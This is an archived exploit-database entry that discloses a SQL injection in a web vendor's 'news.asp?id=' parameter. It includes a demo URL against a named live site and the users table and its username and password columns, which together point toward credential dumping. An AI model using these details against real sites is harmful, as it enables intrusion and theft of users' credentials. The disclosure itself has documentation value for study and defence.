Spokane Web Communications SQL Injection

2011-07-08T00:00:00
ID PACKETSTORM:102922
Type packetstorm
Reporter Bl4ck.Viper
Modified 2011-07-08T00:00:00

Description

                                        
                                            `|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|  
|* ______ ____ __ __   
|* /\__ _\/\ _`\ /\ \/\ \ everythin's black   
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ no turning back   
|* \ \ \ \ \ _ <'\ \ _ \   
|* \ \ \ \ \ \L\ \\ \ \ \ \ [Turkish Hacker]   
|* \ \_\ \ \____/ \ \_\ \_\   
|* \/_/ \/___/ \/_/\/_/   
|*   
|* "I'm Bl4ck.Viper Member Of TBH"   
|* "http://xpl.skote-vahshat.com"   
|*   
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|  
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
|[Title] :[Spokane Web Communications Sql Injection Vulnerability]  
|[Author] :[Bl4ck.Viper]  
|[Home] :[Http://Skote-Vahshat.com]  
|[Archive] :[Http://xpl.skote-vahshat.com]  
|[Vendor] :[http://www.spokaneweb.net/]  
|[Email] :[Bl4ck.Viper@Gmail.Com]  
|[Date] :[2011/07/08]  
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
| [+]Exploit :  
|   
| http://target.com/news.asp?id=[sqli]  
| [+]Demo :  
|  
| http://www.spokanemarcom.com/news.asp?id=99'  
|   
| table of users : members  
| columns of members table :  
| id , username , password   
|  
|  
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
| [+]Greets To :  
| TBH Team, BHG, Pentesters, H4ckcity, Nopotm  
| & All My Friends In Cyber World ...  
|  
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
|=-=-=-=-=-=-=-=-=-=-=-=-=-[Turkish Hacker]=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
`